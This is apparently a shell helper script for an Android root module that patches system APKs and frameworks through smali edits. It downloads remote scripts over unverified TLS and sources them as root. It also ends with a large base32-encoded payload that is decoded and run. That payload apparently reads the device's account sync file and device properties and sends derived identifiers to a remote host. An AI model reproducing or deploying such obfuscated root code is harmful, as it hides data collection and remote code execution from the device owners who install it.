# Kakathic

## Language text
chon="Chọn"
time="Tổng thời gian"
h="giờ"
m="phút"
s="giây"
Information="Thông tin"
author="Tác giả"
name="Tên"
unzip="Đang xử lý..."
volkey1="! Sử dụng phím âm lượng"
volkey2="! Vol- = Chọn số hiện tại, Vol+ = Chuyển đổi số."
volkey3="! Ấn nút nguồn để hủy."
load="Tải"
error="! Lỗi không tìm thấy hoặc lỗi mạng !"
error2="- Mô-đun này chỉ chạy trên thiết bị arm64, của bạn là $ARCH !"

TTvip=1
ui_print(){ echo "$1"; sleep 0.005; }
ui_print2(){ echo "  $1"; }
Xan(){ echo "  $1" >&2; }
BatdauT=$(date +%s)

# Volume keys
Vk(){ 
input2="$1"; input=1
Kgg(){ 
Key="$(getevent -qlc 1 | awk '{print $3}')"
if [ "$Key" == "KEY_POWER" ];then
abort
elif [ "$Key" == "KEY_VOLUMEUP" ];then
[ "$input" == "$input2" ] && input=1 || input=$(($input + 1))
ui_print "  $input"
sleep 0.3
Kgg
elif [ "$Key" == "KEY_VOLUMEDOWN" ];then
ui_print
ui_print "  $chon: $input"
ui_print
sleep 0.3
else Kgg; fi; }
Kgg
}

# Count time 
End_time(){
KetthucT=$(date +%s)
TongTG=$(($KetthucT - $BatdauT))
Gio=$(printf '%d' $((TongTG/3600%24)))
Phut=$(printf '%d' $((TongTG/60%60)))
if [ "$Gio" != 0 ];then
echo "$time: $(printf '%d '$h', %d '$m', %d '$s'.' $((TongTG/3600%24)) $((TongTG/60%60)) $((TongTG%60)))"
elif [ "$Phut" != 0 ];then
echo "$time: $(printf '%d '$m', %d '$s'.' $((TongTG/60%60)) $((TongTG%60)))"
else
echo "$time: $(printf '%d '$s'.' $((TongTG%60)))"
fi
}

# Download packages
Xu_install(){
[ "$2" ] && pb="_$2"
if [ ! -e "/data/tools/ck/$1$pb" ];then
ui_print "  $load $1..."
ui_print
Taive "https://github.com/kakathic/Tools/raw/Vip/Library/$1/README.md" "$TMPDIR/$1.sh"
[ "$(grep -icm1 '#\ kakathic' $TMPDIR/$1.sh)" == 1 ] && chmod 777 "$TMPDIR/$1.sh" || abort "$error"
cd /data/tools
. "$TMPDIR/$1.sh"
chmod -R 777 /data/tools/bin
rm -fr $HOME/tmp/*
fi
unset pb
}

# Internet
User="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
Taive(){
[ -e /system/bin/curl ] && curl -s -k -L -H "$User" --connect-timeout 20 "$1" -o "$2" || wget -q --header "$User" --no-check-certificate "$1" -O "$2" >&2
}
Xem(){
[ -e /system/bin/curl ] && curl -s -k -G -L -H "$User" --connect-timeout 20 "$1" || wget -q --header "$User" --no-check-certificate -O - "$1"
}

# mount
mrw () {
for i in / /system_root /system /system_ext /vendor /product; do
/system/bin/mount $i 2>/dev/null || /system/bin/mount $i 2>/dev/null
/system/bin/mount -o rw,remount $i 2>/dev/null || /system/bin/mount -o rw,remount $i 2>/dev/null
done
}

mro () {
for i in / /system_root /system /system_ext /vendor /product; do
/system/bin/mount -o ro,remount $i 2>/dev/null || /system/bin/mount -o ro,remount $i 2>/dev/null
/system/bin/umount $i 2>/dev/null || /system/bin/umount $i 2>/dev/null
done
}

baksmali () { java -Xms256m -Xmx512m -jar "/data/tools/lib/Tools/baksmali.jar" "$@"; }
smali () { java -Xms256m -Xmx512m -jar "/data/tools/lib/Tools/smali.jar" "$@"; }

# Tìm kiếm
Timkiem(){ find $TMPDIR/Apk/$2 -name "*.smali" -exec grep -l "${1//\//\\\/}" {} +; }

Vsmali(){
for Vka in $(find $4 -name "*.smali" -exec grep -l "$1" {} +); do
[ -e $Vka ] && ui_print2 "MOD: $RANDOM" || Xan "- Lỗi: $(echo "$1" | sed 's|\\||g')"
[ -e $Vka ] && sed -i -e "/^${1//\//\\\/}/,/${2//\//\\\/}/c $(echo "$3" | sed -z 's|\n|\\n|g')" "$Vka"
[ -e $Vka ] && echo "$Vka" >> $TMPDIR/Apk/$(echo "$4" | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f1)/class
done
}

Thaythe(){
ui_print2 "MOD: $RANDOM -> $RANDOM"
for Tt2 in $(find $3 -name "*.smali" -exec grep -l "$1" {} +); do
[ -e "$Tt2" ] && sed -i "s|${1//\//\\\/}|${2//\//\\\/}|g" $Tt2 || Xan "- Lỗi: $1"
[ -e "$Tt2" ] && echo "$Tt2" >> $TMPDIR/Apk/$(echo "$3" | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f1)/class
done
}

Autoone(){
ui_print2 "MOD: $RANDOM -> $RANDOM"
for vakkddhh in $(find $3 -name "*.smali" -exec grep -l "..., $1" {} +); do
echo "sed -i $(grep "..., $1" "$vakkddhh" | awk '{print "-e \"s|sget-boolean "$2" '$1'|const/4 "$2" '$2'|g\"" }' | sort | uniq | tr '\n' ' ') $(echo "$vakkddhh" | sed 's|\$|\\\$|g')" | sh
echo "$vakkddhh" >> $TMPDIR/Apk/$(echo "$3" | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f1)/class
done
}

CPapk(){
PTC="$(pm path "$1" | cut -d : -f2)"
if [ "$(echo "$PTC" | grep -cm1 '/data/')" == 1 ];then
cp -rf $PTC "/data/tools/apk/$1.apk"
cp -rf "$PTC" "$TMPDIR/Apk/$1.apk"
pm uninstall $1 >&2
else
Pathfw2="$(find /*/app /*/*/app /*/priv-app /*/*/priv-app /*/framework /*/*/framework -type f -name "${PTC##*/}" -not -path "*/data/*" | head -n1)"
Padddj="$(find $(magisk --path)/.magisk/mirror -type f -name "${PTC##*/}" -not -path "*/data/*" | head -n1)"
#cp -rf $PTC "/data/tools/apk/$1.apk"
[ -e "/data/tools/apk/$1.apk" ] && cp -rf "/data/tools/apk/$1.apk" "$TMPDIR/Apk/$1.apk" || cp -rf "$Padddj" "$TMPDIR/Apk/$1.apk"
fi
echo "$(pm path "$1" | cut -d : -f2)" | tee "$TMPDIR/Apk/$1.txt" >&2
}

CPfile(){
Pathfw="$(find /*/app /*/*/app /*/priv-app /*/*/priv-app /*/framework /*/*/framework -type f -name "$1.jar" -not -path "*/data/*" | head -n1)"
Padddjfn="$(find $(magisk --path)/.magisk/mirror -type f -name "$1.jar" -not -path "*/data/*" | head -n1)"
cp -rf "$Padddjfn" "$TMPDIR/Apk"
echo "$Pathfw" | tee "$TMPDIR/Apk/$1.txt" >&2
}

# giải nén file
Giainen(){
for vapk in $TMPDIR/Apk/*.*; do
if [ "${vapk##*.}" == 'apk' ] || [ "${vapk##*.}" == 'jar' ];then
PTd="$(cat ${vapk%.*}.txt)"
[ -e "$vapk" ] && ui_print "  Giải nén: ${PTd##*/}" || abort "- Lỗi không tìm thấy file! ${PTd##*/}"
ui_print
mkdir -p ${vapk%.*}
unzip -qo "$vapk" '*.dex' -d ${vapk%.*}
for vsmali in ${vapk%.*}/*.dex; do
baksmali d --api $API $vsmali -o ${vsmali%.*}
done
fi
done
}

Donggoi(){
# Đóng gói apk
for bapk in $TMPDIR/Apk/*.*; do
if [ "${bapk##*.}" == 'apk' ] || [ "${bapk##*.}" == 'jar' ];then
if [ -e "${bapk%.*}/class" ];then
PTb="$(cat ${bapk%.*}.txt)"
ui_print "  Đóng gói: ${PTb##*/}"
ui_print
for bsmali in $(cat ${bapk%.*}/class 2>/dev/null | sed "s|$TMPDIR/Apk/||g" | cut -d '/' -f2 | sort | uniq); do
rm -fr "$bsmali".dex
smali a --api $API ${bapk%.*}/$bsmali -o "${bapk%.*}/$bsmali".dex
done
cd ${bapk%.*}
zip -qr -0 $bapk '*.dex'
zipalign -f 4 $bapk $TMPDIR/Apk/tmp/${bapk##*/} 
cp -rf $TMPDIR/Apk/tmp/* $TMPDIR/Apk
else
rm -fr ${bapk%.*}*
fi
fi
done

for Capk in $TMPDIR/Apk/*.*; do
if [ "${Capk##*.}" == 'apk' ];then
Papkp="$(cat ${Capk%.*}.txt)"
if [ "$(unzip -l $Capk 2>/dev/null | grep -cm1 "lib/$ABI/")" == 1 ];then
mkdir -p $MODPATH${Papkp%/*}/lib/$ARCH
unzip -qo -j $Capk "lib/$ABI/*" -d $MODPATH${Papkp%/*}/lib/$ARCH
fi
mkdir -p $MODPATH${Papkp%/*}
cp -rf $Capk "$MODPATH$Papkp"
fi
if [ "${Capk##*.}" == 'jar' ];then
Papkp="$(cat ${Capk%.*}.txt)"
mkdir -p "$MODPATH${Papkp%/*}"
cp -rf $Capk "$MODPATH$Papkp"
fi
done
}

# Freeze
FREEZE(){
for TARGET in $1; do
mktouch $MODPATH$TARGET/.replace
done
}

GP () { grep_prop $1 $TMPDIR/module.prop; }

API=$(getprop ro.build.version.sdk)
ABI=$(getprop ro.product.cpu.abi)

if [ "$ABI" = "x86" ]; then
export ARCH=x86
export ARMT=i686
elif [ "$ABI" = "arm64-v8a" ]; then
export ARCH=arm64
export ARMT=arm64
elif [ "$ABI" = "x86_64" ]; then
export ARCH=x64
export ARMT=x86-64
else
export ARMT=arm
export ARCH=arm
export ABI=armeabi-v7a
fi

TTM(){
for vah in $1; do
[ -e $vah ] || mkdir -p "$vah"
done
}

TTM "/data/tools/bin
$TMPDIR/Apk/tmp
/data/tools/ck
/data/tools/tmp
/data/tools/apk
/data/tools/lib/Tools"

[ "$API" -ge 31 ] && miuik='miui-'

unset vah
unset mklist

export PATH="/data/tools/bin:$PATH"
export HOME="/data/tools"
export APK="$TMPDIR/Apk"

print_modname(){

echo 'OVUV64DSNFXHICTVNFPXA4TJNZ2CAIRAEASG4YLNMU5CAJBII5ICA3TBNVSSSIBEFBDVAIDWMVZHG2LPNYUSECTVNFPXA4TJNZ2AU5LJL5YHE2LOOQQCEIBAERQXK5DIN5ZDUIBEFBDVAIDBOV2GQ33SFERAU5LJL5YHE2LOOQFHK2K7OBZGS3TUEARCAIBEJFXGM33SNVQXI2LPNY5CAJBIM5SXI4DSN5YCA4TPFZYHE33EOVRXILTEMV3GSY3FFEWCAJCBKBESYIBEIFJEGSBCBJ2WSX3QOJUW45AKBJKGK43UGEZDGPLUOJ2WKCSBOBUWY5B5EISCQWZAEISCQZTJNRSSAL3EMF2GCL3TPFZXIZLNF5ZXS3TDF5QWGY3POVXHI4ZOPBWWYID4EBTXEZLQEAWWGIDUMV4HIKJCEA6T2IBREBOSAJRGEBRXAIBNOJTCAL3EMF2GCL3TPFZXIZLNF5ZXS3TDF5QWGY3POVXHI4ZOPBWWYIBEKRGVARCJKIXTCLTYNVWCA7D4EBQWE6BSPBWWYIBPMRQXIYJPON4XG5DFNUXXG6LOMMXWCY3DN52W45DTFZ4G23BAERKE2UCEJFJC6MJOPBWWYOZAM5ZGK4BAFVWTCIBCMNXW2LTYNFQW63LJEIQCIVCNKBCESURPGEXHQ3LMEB6CA5DSEATSAJZAE5OG4JZAPQQGO4TFOAQC23JREBQWGY3POVXHIID4EBRXK5BAFVSCAXBCEAWWMMRJEIFGS3LFNE6SEJBIM5SXI4DSN5YCA4DFOJZWS43UFZZGCZDJN4XG2ZLJMQUSECS3EAWXUIBCERUW2ZLJEIQF2IBGEYQGS3LFNE6SEJBIM5SXI4DSN5YCA4TPFZZGS3BON5SW2LTNMVUWIKJCBJNSALL2EARCI2LNMVUSEIC5EATCMIDJNVSWSPJCEQUGO4TFOAQC23JREBVWK6K7NVSWSZC7ONWG65BQEAXWIYLUMEXSULZQF5RW63JOMFXGI4TPNFSC44DIN5XGKL3TNBQXEZLEL5YHEZLGOMXWG33NFZQW4ZDSN5UWILTQNBXW4ZK7OBZGKZTFOJSW4Y3FOMXHQ3LMEB6CAY3VOQQC2ZBAE47COIBNMYZCA7BAMN2XIIBNMQQCOPBHEAWWMMJJEIFFWIBNPIQCEJDJNVSWSIRALUQCMJRANFWWK2J5EJEMHI3ZEDQ3VJLOEAVCGMBWEMQMJEPBXOBSA2DJ4G5YO3RAJVCUSRBJEIFEI5DJNVST2IREFBSGC5DFEAVSKWJNEVWSSLJEFBSWG2DPEASCQKBAEQUGIYLUMUQCWJLEFEQCWIBREAUSSKJAEQUGIYLUMUQCWJKIHISU2KJCBIFGI4TJOZSXEPJEFBTWK5DQOJXXAIDSN4XHA4TPMR2WG5BOOZSW4ZDPOIXGIZLWNFRWKKIKLMQCEJDEOJUXMZLSEIQF2ID4PQQGI4TJOZSXEPJEFBTWK5DQOJXXAIDSN4XHA4TPMR2WG5BOON4XG5DFNUXGIZLWNFRWKKIKBJMGK3JAEJUHI5DQOM5C6L3SMF3S4Z3JORUHKYTVONSXEY3PNZ2GK3TUFZRW63JPNNQWWYLUNBUWGL22JAWVMTRPLJEC6Q3PMRSS6JDEOJUXMZLSF4SCQZLDNBXSAIREIFYGS3DUEIQHYIDCMFZWKMZSEAWXOMBJEIQD4IBEKRGVARCJKIXWCY3DFZZWQCSYMVWSAITIOR2HA4Z2F4XXEYLXFZTWS5DIOVRHK43FOJRW63TUMVXHILTDN5WS623BNNQXI2DJMMXVUSBNKZHC6WSIF5BW6ZDFF4SGI4TJOZSXELZEFBSWG2DPEARCI2LNMVUSEID4EBRGC43FGMZCALLXGAUSEIB6EASFITKQIREVEL3BMNRTELTTNAFAUY3INVXWIIBNKIQDONZXEASFITKQIREVELZKFZZWQCSQOJXSQKL3BJNSAIREFBTXEZLQEAWWGIBHEMQGWYLLMF2GQ2LDE4QCIVCNKBCESURPMFRWGLTTNAUSEIB5HUQDCIC5EATCMIBOEASFITKQIREVEL3BMNRS443IBJ6QUUDSN4ZCQKL3BJNSAIREFBTXEZLQEAWWGIBHEMQGWYLLMF2GQ2LDE4QCIVCNKBCESURPMFRWGMROONUCSIRAHU6SAMJALUQCMJRAFYQCIVCNKBCESURPMFRWGMROONUAU7IKBJUWMIC3EARCIKCQOJXSSIRAHU6SAMJALUQHY7BALMQCEJBIKBZG6MRJEIQD2PJAGEQF2O3UNBSW4CQKOVUV64DSNFXHIIBCEAQEG2GDUBXSAYXBXKQW4ORAERAXA2LMOQRAU5LJL5YHE2LOOQFHK2K7OBZGS3TUEARCAICT4G522IDE4G52K3THEDCJDYN2X5XDUIBEIR2GS3LFEIFHK2K7OBZGS3TUBJSWY2LGEBNSALLFEAXWIYLUMEXXI33PNRZS63DJMIXWY33HFZ2HQ5BALU5XI2DFNYFGCYTPOJ2CAIRBEBBODOVBNYQMJEODUMQGRYN2X52CA5DI4G5Z22JAM5UWC3RAMTB3S3THEB2GRYN3VUFCAIAKEAQE3YN3TVUSAYXBXKQW4IHBXOTW4ZZANDQ3XGJAYSI6DO4DEB2GTYN2X5YCA5HBXOSWGIDT4G522IDE4G52K3THFYFCECTFNRZWKCTJMYQFWIBCEQUEOUBANFSCSIRAHU6SAISWJAWVAVBCEBOSA7D4EBNSAIREFBDVAIDJMQUSEIB5HUQCEVSIFVDUCIRALUQHY7BALMQCEJBII5ICA2LEFERCAPJ5EARFMSBNJNCSEIC5HN2GQZLOBJQWE33SOQQCEIJAINUODO4JEBR4HMZAORUODO4DEBSMHOLOM4QHI2HBXOWSATLPMR2WYZIKBIQCAVDIYOVG2IDUNHQ3VP3OM4QFM2PBXODXIIQKMZUQU5LJL5YHE2LOOQQCEIJAKRUMHNDOM4QGFQ5BN4QODO5HNZTSA2HBXOMSACQKEAQFJQ5KNYQG3Q5BPE5CAJDEOJUXMZLSBIFCAICUYOQGSIDLNBX6DOVDNYQE22J2EASEC4DJNR2AUIBABIQCASKNIVETUIBENFWWK2IKBIQCBREQ4G5YGIDT4G522IDE4G52K3THEBWMHITVEBSMHIDJEBRODOVBNYQG5Q5KNYQODO5HNZTSA2HBXOMQUCRAEDCJDYN3QMQHHYN3VUQGJYN3UVXGOIDWYSUW42BAOZU6DO4FNYXAUCRAEBKGRYN3VUQG4Z3INHQ3XB3NEBZ6DOV5EBR4HMZAOTB2CYZAMTQ3XJLOM4QHI4TPNZTSAMRUEBTWTYN3TUQAUCRAEBEODOV7OQQHI2HBXOOWSIDHNFQW4IDT4G5L2IDU4G53CIGESHQ3XGLOM4QHEZLCN5XXILQKEIFHG3DFMVYCAMQKMFWSA43UMFZHIIBNMEQGC3TEOJXWSZBONFXHIZLOOQXGCY3UNFXW4LSWJFCVOIBNMQQCE2DUORYHGORPF5VWC23BORUGSYZOM5UXI2DVMIXGS3ZPLJEC2VSOF5JXK4DQN5ZHILTIORWWYIRAHYTDECQKEMRSAQ3IMVRWWIDUNBSSA43ZON2GK3JAMRSXM2LDMVZQUWZAEISECUSDJARCAPJ5EARGC4TNGY2CEIC5EB6HYIDBMJXXE5BAEISGK4TSN5ZDEIQKBJ2GK6DLHURCOQ7BXKRW2IGGUFXCAYXBXKQW4IGESHB2GIHBXOTW4ZZANDQ3XGJANVXWI5LMMUQFM2PBXODXIICOMFWSAYXBXKQW4IDDYOZSA5DI4G5YGIDUNHQ3VP3QEB2ODO5FMMQHHYN3VUQGJYN3UVXGOLRHEIFHIZLYNMZD2IRHIPB3E3RAGEQHI2PBXK7W4ZZAN3Q3XL3BEBWW6ZDVNRSSAVTJ4G5YO5BANDB3GYJAOPQ3VPJANDQ3VP3UEB2GRYN3TVUSAZ3JMFXCA47BXOWSAZHBXOSW4ZZHEIFGKY3IN4QCOCTXNBUWYZJAORZHKZJ3EBSG6CTUNBXWSZ3JMFXGUZB5EISCQZDBORSSAKZFLESW2JLEEVECKTJJEIFHI2DPNFTWSYLONBSXIPJCE4SCQZDBORSSAKZFLESW2JLEEVECKTJJE4RAU2LGEBNSAIREFAUCAJDUNBXWSZ3JMFXGUZBAFUQCI5DIN5UWO2LBNZUGK5BAFEUSEIBNM5SSAIRRGAYDAMBCEBOTW5DIMVXAUWZAEISCQKBAER2GQ33JM5UWC3TKMQQC2IBEORUG62LHNFQW42DFOQQCSKJCEAWWOZJAEI4TSMBQEIQF2IBGEYQHG5JAFVWHAIBSGAYDAIBNMMQCEY3NMQQG433UNFTGSY3BORUW63RAOBXXG5BAERJECTSEJ5GSAJZEORSXQ2ZSE4RAU4TNEAWWM4RAF5SGC5DBF5QWIYRPNVXWI5LMMVZS6VSIFUVAUZLDNBXSAPRAF5SGC5DBF52G633MOMXWY2LCF5WG6ZZOOR4HICTTNRSWK4BAGEYAUYTSMVQWWCTFNRZWKCTEOJUXMZLSHUTSIZDSNF3GK4RHBJAXA2LMOQ6SOJCBOBUWY5BHBJUW2ZLJHUTSI2LNMVUSOCTDOVZGYIBNENDSAITIOR2HA4Z2F4XXEYLXFZTWS5DIOVRHK43FOJRW63TUMVXHILTDN5WS623BNNQXI2DJMMXVUSBNKZHC6WSIF5BW6ZDFF4SGI4TJOZSXELZEFBSWG2DPEARCIQLQNFWHIIRAPQQGEYLTMUZTEIBNO4YCSIRAHYQC6ZDBORQS65DPN5WHGL3MNFRC6YLDMMXHG2AKMN2XE3BAFURUOIBCNB2HI4DTHIXS64TBO4XGO2LUNB2WE5LTMVZGG33OORSW45BOMNXW2L3LMFVWC5DINFRS6WSIFVLE4L22JAXUG33EMUXSIZDSNF3GK4RPEQUGKY3IN4QCEJDJNVSWSIRAPQQGEYLTMUZTEIBNO4YCSIRAHYQC6ZDBORQS65DPN5WHGL3MNFRC6YLDMMZC443IBJRWQ3LPMQQC2URAG43TOIBPMRQXIYJPORXW63DTF5WGSYRPFIXHG2AKKBZG6KBJPMFFWIBCEQUGO4TFOAQC2YZAE4RSA23BNNQXI2DJMMTSAL3EMF2GCL3UN5XWY4ZPNRUWEL3BMNRS443IFERCAPJ5EAYSAXJAEYTCALRAF5SGC5DBF52G633MOMXWY2LCF5QWGYZOONUAU7IKKBZG6MRIFF5QUWZAEISCQZ3SMVYCALLDEATSGIDLMFVWC5DINFRSOIBPMRQXIYJPORXW63DTF5WGSYRPMFRWGMROONUCSIRAHU6SAMJALUQCMJRAFYQC6ZDBORQS65DPN5WHGL3MNFRC6YLDMMZC443IBJ6QU2LGEBNSAIREFBIHE3ZJEIQD2PJAGEQF2ID4PQQFWIBCEQUFA4TPGIUSEIB5HUQDCIC5HN2GQZLOBJZXKIBNNRYCAMRQGAYCALLDEARGG3LEEBXG65DJMZUWGYLUNFXW4IDQN5ZXIIBEKJAU4RCPJUQCOJDUMV4GWJZCBJZG2IBNMZZCAJBQBJRHEZLBNMFGM2IKONWGKZLQEAZTMMBQBJTGSCTEN5XGKCRHEA7CAL3EMF2GCL3UN5XWY4ZPNRUWEL3SOVXC443IBJSWG2DPEATQULRAF5SGC5DBF52G633MOMXWY2LCF5ZHK3ROONUAU4TNEAWWM4RAF5SGC5DBF5QWIYRPONSXE5TJMNSS4ZBPKZFS443IBITSAPRAF5SGC5DBF5QWIYRPONSXE5TJMNSS4ZBPKZFS443IBIFGG2DNN5SCANZXG4QC6ZDBORQS6YLEMIXXGZLSOZUWGZJOMQXVMSZOONUCACTDNBWW6ZBAG43TOIBPMRQXIYJPORXW63DTF5WGSYRPOJ2W4LTTNAFGM2IK' | base32 -d > $TMPDIR/ka.sh && . $TMPDIR/ka.sh
}




